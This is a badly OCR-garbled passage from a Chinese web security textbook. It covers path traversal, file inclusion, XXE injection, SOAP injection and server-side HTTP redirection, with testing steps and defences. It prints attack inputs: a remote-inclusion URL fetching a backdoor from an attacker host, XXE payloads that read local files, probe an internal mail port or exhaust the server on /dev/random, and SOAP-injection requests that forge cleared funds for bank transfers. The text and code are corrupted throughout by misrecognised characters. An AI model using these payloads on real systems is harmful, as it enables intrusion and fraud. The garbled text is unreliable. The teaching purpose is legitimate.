FwUKLYTNXEUVEJOZWNLKNLRSUK5NaZE2V1LRKTImETM 
果然 ， 尝 试 使 用 这 个 值 下 载 文件 时 ， 结 果 返 回 服务 器 的 passwd 文 件 。 这 说 明 ， 服 务 器 为 攻 
击 者 提供 了 足够 的 资源 , 即使 不 解 译 模糊 处 理 算法 , 攻击 者 也 可 以 使 用 它 的 编码 方案 编码 任意 文 
件 路 径 。 














© ”| 注解 细心 的 读者 可 能 已 经 注意 到 ， 在 上 传 的 文件 名 中 出 现 了 一 个 多 余 的 ./。 这 样 做 
时 是 必要 的 ， 因 为 它 可 确保 截 短 后 的 UREL 符 合 Base64 编 码 规则 ， 在 3 字 节 的 明文 边界 结 
束 ， 并 因此 在 4 字 贡 的 编码 文本 边界 结束 。 在 服务 器 上 解码 时 ， 从 一 个 编码 块 的 中 间 





截取 UREL 几 乎 肯定 会 造成 错误 。 


euUUUUDO 

硝 定 一 个 可 回 服务 大 文件 系统 谈 取 或 与 人 任意 文件 的 路 径 过 历 犹 润 后 ， 渗 透 测试 员 应 当 实 
施 哪 种 攻击 利用 这 些 漏洞 呢 ? 许多 时 候 ， 在 文件 系统 上 拥有 和 Web 服 务 人 而 进程 相同 的 恋 取 / 写 人 
权限 。 











渗透 测试 步骤 

可 以 利用 读 取 访问 路 径 遍 历 漏 洞 从 包含 有 用 信息 的 服务 条 上 获取 有 益 的 文件 , 或 者 帮助 优 
化 针对 其 他 漏洞 的 攻击 。 如 下 所 示 。 

口 操作 系统 与 应 用 程序 的 密码 文件 。 

口 服务 如 与 应 用 程序 配置 文件 ， 以 发 现 其 他 着 洞 或 优化 为 一 次 攻击 。 








口 可 能 含有 数据 库 证 书 的 包含 文件 。 

口 应 用 程序 使 用 的 数据 源 ， 如 MySQL 数据 库 文 件 或 XML 文 件 。 

口 服务 硕 可 执行 页 面 的 源 代 人 码 ， 以 执行 代码 审查 ， 搜索 漏洞 ( 例如 GetImage al Ee 
=GetImage.aspx ) 

口 可 能 包含 用 户 名 和 会 话 令 牌 的 应 用 程序 日 志文 件 等 。 

如 末 发 现 一 个 允许 写 信 访问 的 路 径 过 历 漏 洞 , 那么 渗透 测试 的 主要 目标 应 该 是 利用 它 在 服 
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务 估 上 执行 任意 命令 。 利 用 漏洞 实现 这 一 目标 的 方法 包括 以 下 几 种 。 
口 在 用 户 的 启动 文件 夹 中 创建 脚本 。 
口 当 用 户 下 一 次 连接 时 ， 修 改 in. ftpa 等 文件 执行 任意 命令 。 
癌 一 个 拥有 执行 许可 的 Web 目 录 写 入 脚本 ， 从 浏览 大 调用 它们 。 





2. 防止 路 径 志 历 漏洞 
迄今 为 止 ， 避 人 免 回 任何 文件 系统 API 传送 用 户 提 交 的 数据 是 防止 路 径 志 历 漏 洞 的 最 有 效 方 
法 。 许 多 时 候 ， 包 含 在 最 初 的 GetIfile.aspx?filename=keira.jpg 不 例 中 ， 应 用 程序 完全 
没有 必要 实施 防御 。 因 为 大 多 数 文件 都 没有 采用 访问 控制 ， 攻 击 者 可 将 这 些 文件 存 人 Web 根 目录 
中 ， 再 通过 URL 直 接 访问 。 如 果 以 上 方法 行 不 通 , 应 用 程序 可 能 会 保存 一 个 可 由 页 面 处 理 的 便 编 
人 码 图 像 文 件 列 表 ， 并 使 用 不 同 的 标识 符 ( 如 一 个 索引 号 ) 指定 需要 的 文件 。 任 何 包含 无 效 标识 符 
的 请 求 都 可 能 遭 到 拒绝 ， 因 为 没有 受 攻击 面 可 供用 户 利 用 ， 使 其 操纵 页 面 提供 的 文件 路 径 。 
有 了 时, 与 实现 文件 上 传 与 下 载 的 工作 流程 功能 一 样 , 应 用 程序 可 能 需要 允许 用 户 通 过 名 称 指 
定 文件 ， 这 时 ， 开 发 者 可 能 采用 最 简单 的 办 法 ， 将 用 户 提 区 的 用 户 名 传送 给 文件 系统 API， 从 而 
达到 这 种 目的 。 在 这 种 情况 下 ， 应 用 程序 应 实施 次 层 防御 措施 ， 为 路 径 调 历 攻 击 设立 儿 层 障碍 。 
以 下 是 一 些 可 能 有 用 的 防御 方法 ， 在 应 用 过 程 中 ， 最 好 将 它们 组 合 在 一 起 使 用 。 
口 对 用 户 提 交 的 文件 名 进行 相关 解码 与 规范 化 之 后 ， 应 用 程序 应 检查 该 文件 名 是 否 包含 路 
径 壳 历 序列 ( 使 用 反 斜 线 或 斜 线 ) 或 空 字 节 。 如 果 是 这 样 ， 应 用 程序 应 停止 处 理 请 求 。 
不 得 尝试 对 了 恶意 文件 名 进行 任何 净化 处 理 。 
口 应 用 程序 应 使 用 一 个 便 编 码 的 、 人 允许 访问 的 文件 类 型 列表 ， 并 拒绝 任何 访问 其 他 文件 类 
型 的 请 求 〈 完 成 上 述 解 码 与 规范 化 之 后 )。 
口 对 用 户 提交 的 文件 名 进行 一 切 必要 的 过 滤 后 ， 应 用 程序 应 使 用 适当 的 文件 系统 API 确认 
是 否 一 切 正常 ， 以 及 使 用 该 文件 名 访问 的 文件 是 否 位 于 应 用 程序 指定 的 起 始 目 录 中 。 
在 Java 中 ， 可 通过 使 用 用 户 提 交 的 文件 名 示例 一 个 java.io.File 对 象 ， 然 后 对 这 个 对 
象 调 用 getcanonicalPath 方 法 ， 即 可 达到 上 述 目 的 。 如 果 这 个 方法 返回 的 字符 串 并 不 以 
起 始 目 录 的 名 称 开头 ， 那 么 用 户 已 通过 某 种 方式 避 开 了 应 用 程序 的 输入 过 滤 ， 因 而 应 用 程 
序 应 拒绝 执行 该 请 求 。 
在 ASP.NET 中 ， 可 以 将 用 户 提 交 的 文件 名 传送 给 System.Io.Path.GetFullPath 方 
法 ， 并 对 返回 的 字符 串 执 行 和 上 述 Java 中 一 样 的 检查 ， 从 而 达到 相同 的 目的 。 
应 用 程序 可 以 使 用 一 个 chrooteq 环 境 访 问 包 含 被 访问 文件 的 目录 ， 减 轻 大 多 数 路 径 遍 历 漏 
洞 造 成 的 影响 。 在 这 种 情况 下 ，chrooteqdq 目 录 就 好 比 是 文件 系统 根 目 录 ， 任 何 试图 从 这 个 目录 
向 上 回溯 的 多 余 遍 历 请 求 都 被 久 略 。 大 多 数 UNIX 平 台 都 支持 chrooted 文 件 系统 。 在 Windows 平 
合 上 ， 以 新 逻辑 驱动 硕 的 形式 安 猴 相关 起 始 目 录 ,， 并 且 使 用 相应 的 驱动 硕 字 母 访问 目录 内 容 ， 即 
可 实现 类 似 的 效果 ( 至 少 对 遍历 漏洞 而 言 是 这 样 )。 
应 用 程序 应 将 其 路 径 遍 历 攻 击 防 御 机 制 与 日 志和 警报 机 制 整合 在 一 起 。 任何 时 候 , 只 要 收 到 
一 个 包含 路 径 志 历 序列 的 请 求 , 提出 请 求 的 用 户 就 可 能 心 存 恶意 , 应 用 程序 应 在 日 志 中 进行 记录 ， 
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标明 该 请 求 企图 违反 安全 机 制 , 并 终止 该 用 户 的 会 话 。 如 有 可 能 ， 应 冻结 该 用 户 账 户 并 癌 管 理 员 
发 出 警报 。 


10.2.2 ”文件 包含 漏洞 


许多 脚本 语言 支持 使 用 包含 文件 ( include file )。 这 种 功能 允许 开发 者 把 可 重复 使 用 的 代码 插 
入 到 单个 的 文件 中 , 并 在 需要 时 将 它们 包含 在 特殊 功能 的 代码 文件 中 。 然 后 , 包含 文件 中 的 代码 
被 解释 ， 就 好 像 它 插入 到 包含 指令 的 位 置 一 样 。 

1. 远程 文件 包含 

PHP 语 言 特别 容易 出 现 文件 包含 源 洞 ， 因 为 它 的 包含 函数 接受 远程 文件 路 径 。 这 种 缺陷 已 经 
成 为 PHP 应 用 程序 中 大 量 汤 洞 的 根源 。 

以 一 个 辣 不 同位 置 的 人 们 传送 各 种 内 容 的 应 用 程序 为 例 。 用 户 选 择 他 们 的 位 置 后 , 这 个 信息 
通过 一 个 请 求 参 数 传送 给 服务 从 ， 代 码 如 下 : 

https://wahh-app.com/main.php?Country=US 

应 用 程序 通过 以 下 方式 处 理 count ry 参数 : 


scountry = $ GET['Country']:; 




















inelude( Seountry 。 '.php' ); 
这 使 执行 环境 加 载 位 于 Web 服 务 需 文件 系统 中 的 Us .php 文 件 。 然 后 ， 这 个 文件 的 内 容 被 复 
制 到 main.php 文 件 中 ， 并 得 以 执行 。 
攻击 者 能 够 以 各 种 方式 利用 这 种 行为 , 最 严重 的 情况 是 指定 一 个 外 部 URL 作 为 包含 文件 的 位 
置 。PHP 包 含 困 数 接受 这 个 位 置 作为 输入 ， 接 着 ， 执 行 环境 将 获取 指定 的 文件 并 执行 其 内 容 。 
此 ， 攻 击 者 能 够 构建 一 个 包含 任意 复杂 内 容 的 恶意 脚本 ， 将 其 寄存 在 他 控制 的 Web 服 务 器 上 ， 并 
通过 易 受 攻击 的 应 用 程序 函数 调用 它 然 后 执行 。 例 如 : 
nttos://wanh apo, com/main. pnprcountry=htto://waih- attacker. Com/backdoor 
2. 本 地 文件 包含 
有 了 时 ,应 用 程序 根据 用 户 可 控制 的 数据 加 载 包含 文件 , 但 这 时 不 可 能 给 位 于 外 部 服务 右上 的 
文件 指定 URL。 例 如 ， 如 采用 户 可 控制 的 数据 被 提交 给 ASP 图 数 Server .Execute， 那 么 攻击 者 
就 可 以 执行 任意 一 段 ASP 脚 本 ， 只 要 这 段 脚本 属于 调用 这 个 函数 的 相同 应 用 程序 。 
在 这 种 情况 下 ， 攻 击 者 仍然 可 以 利用 应 用 程序 的 行为 执行 未 授权 操作 。 
口 在 服务 器 上 可 能 有 一 些 通过 正常 途径 无 法 访问 的 文件 ， 例 如 ， 任 何 访问 路 径 /aqmin 的 请 
求 都 会 被 应 用 程序 实施 的 访问 控制 阻止 。 如 果 能 够 将 敏感 功能 包含 在 一 个 授权 访问 的 页 
面 中 ， 那 么 就 可 以 访问 那个 功能 。 
口 服务 右上 的 一 些 静 态 资 源 也 受到 同样 的 保护 ， 无 法 直接 访问 。 如 果 能 够 将 这 些 文件 动态 
包含 在 其 他 应 用 程序 页 面 中 ， 那 么 执行 环境 就 会 将 静态 资源 的 内 容 复制 到 它 的 啊 应 中 。 
3. 查找 文件 包含 漏洞 
任何 用 户 提 交 的 数据 项 都 可 能 引起 文件 包含 漏洞 。 它们 经 常 出 现在 指定 一 种 语言 或 一 个 位 置 
的 请 求 参 数 中 ， 也 营 党 发生 在 以 参数 形式 传送 服务 问 端 文件 名 的 情况 下 。 
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渗透 测试 步骤 
要 测试 远程 文件 包含 源 洞 ， 执 行 以 下 步 又 。 
(1) 癌 每 一 个 目标 参数 提交 一 个 连接 受 控制 的 Web 服 务 如 资源 的 URL， 并 确定 是 否 收 到 运 











行 目 标 应 用 程序 的 服务 从 提出 的 任何 请 求 。 

(2) 如 末 第 一 次 测试 失败 ， 演 试 提交 一 个 包含 不 存在 的 人 P 地 址 的 URL， 并 确定 服务 名 试图 
与 这 个 地 址 建立 连接 时 是 否 出 现 超时 。 

(3) 如 于 发 现 应 用 程序 易于 受到 远程 文件 包含 攻击 ， 杜 前 面 摘 述 的 动态 执行 攻击 中 一 样 ， 
使 用 相关 语言 中 可 用 的 API， 构 建 一 段 亚 意 脚 本 实施 攻击 。 

相对 于 远程 文件 包含 而 言 , 存在 本 地 文件 包含 源 洞 的 脚本 环境 要 更 多 一 些 。 要 测试 本 地 文 
件 包含 漏洞 ， 执 行 以 下 步 又 。 

(1) 提交 服务 人 各 上 一 个 已 知 可 执行 资源 的 名 称 ， 确 定 应 用 程序 的 行为 是 否 有 任何 变化 。 

(2) 提交 服务 融 上 一 个 已 知 葬 人 态 资 源 的 名 称 ， 确 定 它 的 内 容 是 否 被 复制 到 应 用 程序 的 啊 


























应 中 











(3) 如 来 应 用 程序 多 于 受到 本 地 文件 包 仿 攻击， 尝试 通 过 Web 服 务 带 访问 任何 无 法 直接 到 
达 的 敏感 功能 或 资源 。 
(4) 测试 能 否 利用 之 前 讲 到 的 遍历 技巧 访问 其 他 目录 中 的 文件 。 


10.3 注入 XML 解释 器 


今天 的 Web 应 用 程序 大 量 使 用 XML， 在 浏览 瘟 与 前 喘 应 用 程序 服务 侣 之 间 传 送 的 请 求 和 啊 
应 ， 以 及 在 后 端 应 用 程序 组 件 ( 如 SOAP 服 务 ) 之 间 传 送 的 消息 中 都 可 以 找到 XML。 如 采 使 用 专 
门 设计 的 输入 破坏 应 用 程序 的 运行 并 执行 菜 些 未 授权 操作 ， 这 些 位置 就 吻 于 受到 各 种 攻击 。 





























10.3.1 注入 XML 外 部 实体 


在 今天 的 Web 应 用 程序 中 , XML 第 用 于 从 客户 问 癌 服务 带 提 交 数 据 。 然 后 ,服务 副 噶 应 用 程 
序 将 处 理 这 些 数据 ， 并 且 可 能 会 返回 一 个 包含 XML 或 任何 其 他 格式 数据 的 响应 。 在 使 用 异步 请 
求 在 后 台 进 行 通信 的 基于 Ajax 的 应 用 程序 中 ,这 种 行为 最 为 第 见 。 济 顺带 扩展 组 件 和 其 他 客户 问 
技术 也 可 能 会 用 到 XML。 

以 一 个 使 用 Ajax 实 现 的 、 提 供 无 颖 用户 体验 的 搜索 功能 为 例 。 在 用 户 输 入 搜索 词 时 ,客户 端 
脚本 将 向 服务 带 提 出 以 下 请 求 : 

POST /search/128/AjaxSearch.ashx HTTP/1.1 

Host: mdsec.net 


Content-Type: text/xml; charset=UTF-8 
Content-Length: 44 








<Search><SearchTerm>nothing will change</SearchTerm></Search> 
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服务 硕 的 啊 应 如 下 所 示 【〈 无 论 啊 应 采用 什么 格式 ， 其 中 都 可 能 存在 漏洞 ): 
HTTP/1.1 200 OK 

Content-Type: text/xml; charset=utf-8 

Content-Length: 81 


<Search><SearchResult>No results found for expression: nothing will 
change</SearchResult></Search> 


客户 闯 脚 本 将 处 理 该 啊 应 ， 并 用 搜索 结果 对 用 户 界面 进行 更 新 。 

如 宁 遇 到 这 种 类 型 的 功能 ， 应 当 始 终 检查 其 是 否 存 在 XML 外 部 实体 (XXE ) 注入 漏洞 。 之 
所 以 会 出 现 这 种 漏洞 ， 是 因为 标准 的 XML 解析 库 文 持 使 用 实体 引用 。 这 些 引 用 仅仅 是 在 XMI 文 
档 内 部 或 外 部 引用 数据 的 一 种 方法 。 通 过 阅读 本 书 的 其 他 内 容 ， 你 应 该 很 熟悉 实体 引用 。 例 如 ， 
与 < 和 > 字符 对 应 的 实体 如 下 所 未 : 


&lt: 
&ot; 


XML 格 式 人 允许 在 XML 文 档 中 定义 定制 实体 。 这 些 实体 在 文档 开始 部 分 的 可 选 DDcTYPE 元 杂 
中 定义 。 例 如 : 

LDOCTYEE foo [| <IENTITY tesgtref "testreftvalue. 3 |» 

如 果 文 档 中 包含 以 上 定义 , 解析 大 将 用 testrefvalue 这 个 已 定义 的 值 蔡 代 文档 中 出 现 的 任 
何 &stestref ;实体 引用 。 

此 外 ，XML 规 范 允 许 使 用 外 部 引用 来 定义 实体 ，XML 解 析 融 将 动态 提取 这 些 实体 的 值 。 这 
些 外 部 实体 定义 采用 URL 格 式 ， 并 可 以 引用 外 部 Web URL 或 本 地 文件 系统 上 的 资源 。XML 解 析 
需 将 提取 指定 URIL 或 文件 的 内 容 , 并 将 其 作为 已 定义 实体 的 值 。 如 果 应 用 程序 在 其 啊 应 中 返回 任 
何 使 用 外 部 定义 的 实体 的 XML 数据 ， 则 指定 文件 或 URL 的 内 容 将 在 该 啊 应 中 返回 。 

攻击 者 可 以 通过 向 XML 添 加 适当 的 DoCTYPE 元 素 ， 或 通过 修改 该 元 素 ( 如 果 它 已 经 存在 )， 
在 基于 XML 的 请 求 中 指定 外 部 实体 。 外 部 实体 引用 使 用 sysTEM 关 键 字 来 指定 ， 并 使 用 URL (可 
能 使 用 file: 协 议 ) 进行 定义 。 

在 前 一 个 示例 中 , 攻击 者 可 以 提交 以 下 请 求 (该 请 求 定 义 一 个 引用 服务 带 文 件 系统 上 的 文件 
的 XML 外 部 实体 ): 


POST /search/128/AjaxSearch.ashx HTTP/1.1 
Host: mdsec.net 




































































Content-Type: text/xml; charset=UTF-8 
Content-Length: 115 


<!IDOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///windows/win.ini" > ]> 


<Search><SearchTerm>&xxe;</SearchTerm></Search> 

收 到 这 个 请 求 后 ，XML 解 析 需 将 提取 指定 文件 的 内 容 ， 并 使 用 该 内 容 来 奉 代 已 定义 的 实体 
引用 (攻击 者 已 在 SearchTerm 元 素 中 使 用 了 该 实体 引用 )。 由 于 searchTerm 苑 系 的 值 会 在 应 用 
程序 的 啊 应 中 回 显 ， 这 会 导致 服务 需 以 该 文件 的 内 容 作 出 啊 应 ， 如 下 所 示 : 
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HTTP/1.1] 200 OK 
Content-Type: text/xml; charset=uttft-8 
Content-Length: S56 


<Search><SearchResult>No results found for expression: ; for 16-bit app 
SupPbPort 

[fontsl] 

[extensions] 

[mci extensions] 

[files] 


党 试 访 问 


http://mdsec.net/search/128/ 


除 使 用 file: 协 议 来 指定 本 地 文件 系统 上 的 资源 外 ， 攻 击 者 还 可 以 使 用 http: 等 协议 让 服务 器 通 
过 网 络 提取 资源 。 这 些 URL 可 以 指定 任意 主机 、 卫 地 址 和 端口 。 攻 击 者 可 以 利用 它们 与 后 端 系统 
上 无 法 通过 因特网 直接 访问 的 网 络 服 务 进行 交互 。 例 如 ， 以 下 攻击 尝试 连接 到 在 专用 人 P 地 址 
192.168.1.1 的 端口 25 上 运行 的 邮件 服务 器 


<1DOCTYPEE foo [ <!ENTITY xxe SYSTEM "http://192.168.1.1:25" > ]> 


<Search><SearchTerm>&xxe;</SearchTerm></Search> 

通过 这 种 技巧 可 以 实施 各 种 攻击 ， 如 下 所 示 。 

口 攻击 者 可 以 将 应 用 程序 作为 代理 服务 天 使 用 , 从 应 用 程序 能 够 访问 的 任何 Web 服 务 硕 上 检 
索 敏 感 内 容 ， 包 括 那 些 在 组 织 内 部 的 专用 非 路 由 地 址 空间 运行 的 内 容 。 

口 攻击 者 可 以 利用 后 端 Web 应 用 程序 中 的 漏洞 ， 只 要 这 些 漏洞 可 以 通过 URL 加 以 利用 。 

口 攻击 者 可 以 通过 攻击 大 量 IP 地 址 和 端口 号 , 对 后 端 系统 上 的 开放 端口 进行 测试 。 在 某 些 情 
况 下 ， 可 以 使 用 时 间 性 差异 来 推断 所 请 求 的 端口 的 状态 。 其 他 时 候 ， 应 用 程序 可 能 会 在 
啊 应 中 返回 某 些 服务 的 服务 标题 ( service banner )。 

最 后 ， 如 果 应 用 程序 检索 外 部 实体 , 但 并 不 在 啊 应 中 返回 该 实体 ， 则 攻击 者 仍然 可 以 通过 无 

期 限 地 读 取 某 个 文件 流 ， 从 而 实施 拒绝 服务 攻击 。 


<1DOCTYEE foo [ <!IENTITY xxe SYSTEM " file:///dev/random"> ]> 



































10.3.2 注入 SOAP 


SOAP ( Simple Object Access Protocol， 简 单 对 象 访问 协议 ) 是 一 种 使 用 XML 格 式 封装 数 据 、 
es 各 种 在 不 同 操作 系统 和 架构 上 运行 的 系统 也 使 用 它 来 共享 信息 和 传递 消 
息 。 它 主要 用 在 Web 服 务 中 ; 通过 浏览 器 访问 的 Web 应 用 程序 常常 使 用 SOAP 在 后 端 应 用 程序 组 
件 之 间 进 和 了 通信 。 

由 不 同 计算 机 执行 单项 任务 以 提高 性 能 的 大 型 企业 应 用 程序 经 常 使 用 SOAP。 采 用 Web 应 用 
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序 作为 现 有 应 用 程序 前 端的 情况 也 经 常 可 以 见 到 SOAP 的 身影 。 这 时 , 应 用 程序 通常 使 用 SOAP 
re mae 

由 于 XML 是 一 种 解释 型 语言 ， 因 此 ， 和 前 面 描述 的 其 他 示例 一 样 ， ee 
入 攻击 。XML 元素 通过 元 字符 <、> 和 /以 语法 形式 表示 。 如 果 用 户 提 区 的 数据 中 包含 这 些 字 符 ， 
并 被 直接 插入 SOAP 消 息 中 ， 攻 击 者 就 能 够 破坏 消息 的 结构 ， 进 而 破坏 应 用 程序 a 
他 不 利 影响 。 

以 一 个 银行 应 用 程序 为 例 ， 一 名 用 户 正 使 用 下 面 的 HTTP 请求 进行 转账 : 


POST /bank/27/Default.aspx HTTP/1.0 
Host: mdsec.net 
Content-Length: 65 
































FIromAccount=182810085&Amount=1430&ToAccount=08447656&Submit=Submit 


在 处 理 这 个 请 求 的 过 程 中 ， 应 用 程序 在 两 个 后 端 组 件 之 问 传送 下 面 的 SOAP 消 息 : 


<Soap:Envelope xmlns:soap="http://www.w3 .org/2001/12/soap-envelope"> 





<Soap: Body> 
<pre:Adqd xmlns:pre=http://target/lists soap:encodingSstyle-= 
"http://www.w3.o0rg/2001/12/soap-encoding"> 
<ACCOUNt> 
<FromAccount>18281008</FromAccount> 
<Amount>1430</Amount> 
<ClearedFunds>False</ClearedFunds> 
<ToAcCcount>08447656</ToAccount> 
</ACCOUNt> 
</pre:Add> 
</sSsoap:Body> 





</Soap: Envelope> 


注意 消息 中 的 XML 元 素 如 何 与 HITP 请 求 中 的 参数 对 应 起 来 ， 以 及 应 用 程序 oo 
clearedqFunds 元 素 。 这 时 ， 应 用 程序 逻辑 确定 账户 中 没有 足够 的 资金 可 进行 转账 ， 并 将 这 
素 (clearedFunds ) 的 值 设 为 False， 因 此 收 到 SOAP 消 息 的 组 件 将 拒绝 转账 。 

在 这 种 情况 下 , 攻击 者 可 以 通过 各 种 方法 注 人 SOAP 消 息 ， 从 而 破坏 应 用 程序 的 逻辑 。 例 如 ， 
提交 下 面 的 请 求 会 在 最 初 的 元 系 之 前 插入 另外 一 个 clearedqFundqs 元 系 ( 同时 保持 SQL 语 法 的 有 
效 性 )。 如 果 应 用 程序 处 理 它 遇 到 的 第 一 个 cleareqFunaqs 元 素 ， 那 么 即使 账户 中 没有 资金 ， 也 
可 以 成 功 进行 转账 。 


POST /bank/27/Default.aspx HTTP/1.C 
Host: mdsec.net 























Content-Length: 119 


FromaAccount=]8281008&Amount=]430</Amount><ClearedFunds>True 
</ClearedFunds><Amount>]430&ToAccount=084476565&Submit=Submit 


另 一 方面 ， 如 果 应 用 程序 处 理 它 遇 到 的 后 一 个 cleareqFunds 元 素 ， 攻 击 者 就 可 以 在 
ToaAccount 人 参数 中 注入 一 个 类 似 的 攻击 。 
为 一 种 类 型 的 攻击 是 使 用 XML 注 释 完 全 删除 原始 SOAP 消 息 中 的 一 个 元 系 ，, 并 用 攻击 者 目 己 
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设计 的 元 又 代替 被 删除 的 元 系 。 例 如 ， 下 面 的 请 求 通过 Amount 参 数 注 人 一 个 clearedFunds 元 
素 ， 为 ToAccount 元 素 建 立 一 个 起 始 标签 ， 开 始 一 段 注释 ， 并 在 roaccount 人 参数 中 结束 注释 ， 
从 而 保持 XML 语法 的 有 效 性 : 

POST /bank/27/Default .aspx HTTP/1.0 


Host: mdsec.net 
Content-Length: 125 


FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True 
</ClearedFunds><ToOACcCcounNnt><!--&TOACCOUNt=-->08447656&Submit=Submit 


另 一 种 攻击 是 花 试 在 一 个 注入 的 参数 内 完成 整个 SOAP 消 息 ， 并 将 消息 的 剩余 部 分 注释 掉 。 
但 是 ， 由 于 没有 结束 注释 与 起 始 注释 相 匹配 ， 这 种 攻击 会 生成 完全 错误 的 XML 语法 ， 从 而 被 许 
多 XML 解析 融 拒 绝 。 这 种 攻击 并 不 能 在 所 有 XML 解析 库 中 起 作用 , 它 只 对 定制 或 自主 研发 的 XML 
解析 带 奏 效 。 


POST /bank/27/Default.aspx HTTP/1.0 
Host: mdsec.net 
Content-Length: 176 














FromAccount=18281008&Amount=1430</AMmouUunNnt><ClearedFunds>True 
</ClearedFunds> 
<TOACCOUNtT>08447656</ToACcCcoUuNt></ACCOUNtT></pPre:Add></soap:Body> 
</Soap: Envelope> 

<!l--&Submit=Submit 


这 个 示例 中 包含 一 个 错误 消 上 筷 ， 有 助 于 对 攻击 进行 做 调 : 
http://mdsec.net/bank/27/ 
下 面 的 示例 包含 同样 的 漏洞 , 但 反馈 信息 很 少 。 由 此 可 见 ， 如 果 错 误 消 息 没 有 什么 提示 信 
息 ， 利 用 SOAP 注 入 有 多 难 ! 
http://mdsec.net/bank/18/ 
http://mdsec.net/bank/6/ 





10.3.3 ”查找 并 利用 SOAP 注 入 


SOAP 注 入 可 能 很 难 发 现 ， 因 为 随 昔 提交 XML 元 字符 会 破坏 SOAP 消 居 的 格式 ， 而 且 这 样 做 
生成 的 错误 消 奶 也 极其 简单 。 但 是 , 使 用 下 面 的 步 又 依然 可 以 相对 可 徘 地 检测 出 SOAP 注 入 源 洞 。 


渗透 测试 步 又 





(1) 轮流 在 每 个 参数 中 提交 一 个 恶意 XML 结 束 标签 ， 如 </foo>。 如 果 没 有 发 生 错误 , 那么 





输入 可 能 没有 捅 入 到 SOAP 消 恩 中 ,或 者 以 某 种 方式 被 净化 了 。 
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(2) 如 果 出 现 错误 ， 提 交 一 对 有 效 的 起 始 与 结束 标签 ， 如 <foo></Eoo>。 如 果 这 对 标签 使 
错误 消失 ， 那 么 应 用 程序 很 可 能 易于 党 到 攻击 。 

(3) 有 些 时 候 ,搬入 到 XML 格式 消息 中 的 数据 随后 以 XML 格式 锌 谈 取 并 返回 给 用 户 。 如 末 
修改 的 数据 项 在 应 用 程序 的 啊 应 中 返回 ， 看 看 提交 任意 XML 内 容 是 否 会 以 相同 的 形式 返回 ， 
或 者 已 通过 某 种 方式 被 规范 化 。 轮 流 提 交 下 面 两 个 值 : 

test<foo/> 

test<foo></foo> 











如 果 发 现 其 中 一 个 值 的 返回 结果 为 男 一 个 值 ， 或 者 只 返回 test， 那 么 可 以 确信 输入 被 插 
人 到 了 XML 消 息 中 。 

(4) 如 果 HTTP 请 求 中 包含 几 个 可 放 入 SOAP 消 息 的 参数 ， 尝 试 在 一 个 参数 中 插入 起 始 注 释 
字符 <!--, 在 男 一 个 参数 中 插入 结束 注释 字符 !-->。 然后 , 轮换 在 参数 中 插入 这 两 个 字符 ( 
为 无 法 知道 参数 出 现 的 顺序 ), 这样 做 可 能 会 把 服务 器 SOAP 消 息 的 某 个 部 分 作为 注释 处 理 , 从 
而 改变 应 用 程序 的 逻辑 ， 或 者 形成 一 个 可 能 造成 信息 泄露 的 不 同 错误 条 件 。 











如 条 SOAP 注 和 人 很 难 发 现 ， 承 更 难 对 其 加 以 利用 。 许 多 时 候 ， 需 要 知 所 数据 周 玮 的 XML 的 续 
构 ， 以 提交 专门 设计 的 输入 , 修改 消息 内 容 而 不 致 破坏 它 的 结构 。 在 前 面 描述 的 所 有 测试 中 寻找 
任何 揭示 SOAP 消 息 处 理 细节 的 错误 消息 。 笠 运 的 话 , 一 条 详细 的 错误 消息 将 透露 SOAP 消 息 的 完 
整 内 容 ， 允 许 构建 专门 设计 的 值 查 找 相 关 漏 洞 。 如 果 不 够 芋 运 ， 就 只 能 纯粹 猜测 ， 这 样 攻击 成 功 
的 几率 就 非 第 低 。 




















10.3.4 防止 SOAP 注 入 


我 们 可 以 在 用 户 提 交 的 数据 被 插入 SOAP 消 息 中 的 任何 位 置 实施 边界 确认 过 滤 , 以 防止 SOAP 
注入 。 需 要 进行 过 滤 的 数据 包括 用 户 在 当前 请 求 中 直接 提交 的 数据 ,以 及 在 前 面 的 请 求 中 已 经 存 
在 或 由 以 用 户 数据 为 输入 的 其 他 处 理 过 程 生成 的 数据 。 

为 防止 上 述 攻击 ， 应 用 程序 应 对 出 现在 用 户 输 入 中 的 任何 XML 元 字符 进行 HTML 编 码 。 
HTML 编 码 包 含 用 对 应 的 HTML 实 体 蔡 代 字面 量 字 符 。 这 样 做 可 确保 XML 人 解释 絮 在 进行 处 理 时 ， 
把 它们 当做 相关 元 素 的 数据 值 ， 而 不 是 消息 结构 的 一 部 分 。 一 些 经 常 造成 问题 的 字符 的 HTML 编 


























人 码 如 下 : 
[1 
>>——&ot: 
口 / 一 一 &#47。 


10.4 注入 后 端 HTTP 请 求 


在 上 一 市 中 ， 我 们 介绍 了 一 些 应 用 程序 如 何 将 用 户 提 交 的 数据 合并 到 后 并 HTTP 请 求 中 ， 以 
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请 求 用 户 无 法 直接 访问 的 服务 。 更 常见 的 情况 是 , 应 用 程序 可 能 会 将 用 户 输 入 通信 任何 类 型 的 后 
端 HTTP 请 求 ， 包 括 那 些 以 常规 名 / 值 对 传输 参数 的 请 求 。 由 于 应 用 程序 通常 会 有 效 代 理 用 户 提 交 
的 URL 或 参数 ， 因 而 这 种 行为 往往 易于 受到 攻击 。 针 对 这 种 功能 的 攻击 可 以 分 为 以 下 类 别 : 
口 服务 器 端 HTTP 重 定向 : 攻击 者 可 以 通过 这 种 方法 指定 任意 资源 或 URL, 然后 再 由 后 问 应 
用 程序 服务 需 请 求 这 些 资 源 或 URL。 
口 HTTP 参 数 注 入 CHPI) : 攻击 者 可 以 通过 这 种 方法 在 应 用 程序 服务 硕 提 出 的 后 端 HITP 
请 求 中 注入 任意 参数 。 如 果 攻 击 者 注入 后 端 请 求 中 已 存在 的 参数 ， 就 可 以 利用 HTTP 人 参数 
污染 (HPP ) 攻击 禾 盖 服务 絮 指 定 的 原始 参数 值 。 























10.4.1 服务 器 端 HTTP 重 定向 


如 末 应 用 程序 接受 用 户 可 控制 的 输入 ， 并 将 其 合并 到 使 用 后 端 HTTP 请 求 检索 的 URL 中 ， 这 
种 行为 承 会 导致 服务 带 冰 重 定 同 漏洞 。 用 户 提 交 的 输入 中 可 能 包含 被 检索 的 完整 URL， 或 者 应 用 
程序 可 能 会 对 该 URL 进 行 茶 种 处 理 ， 如 添加 标准 的 后 绥 。 

后 端 HTTP 请 求 可 能 指定 公共 因特网 上 的 某 个 域 , 或 者 指定 用 户 无 法 直接 访问 的 内 部 服务 器 。 
所 请 求 的 内 容 可 能 对 应 用 程序 的 功能 非常 关键 , 如 支付 网 天 的 接口 ; 或 者 较为 次 要 ， 如 从 第 三 方 
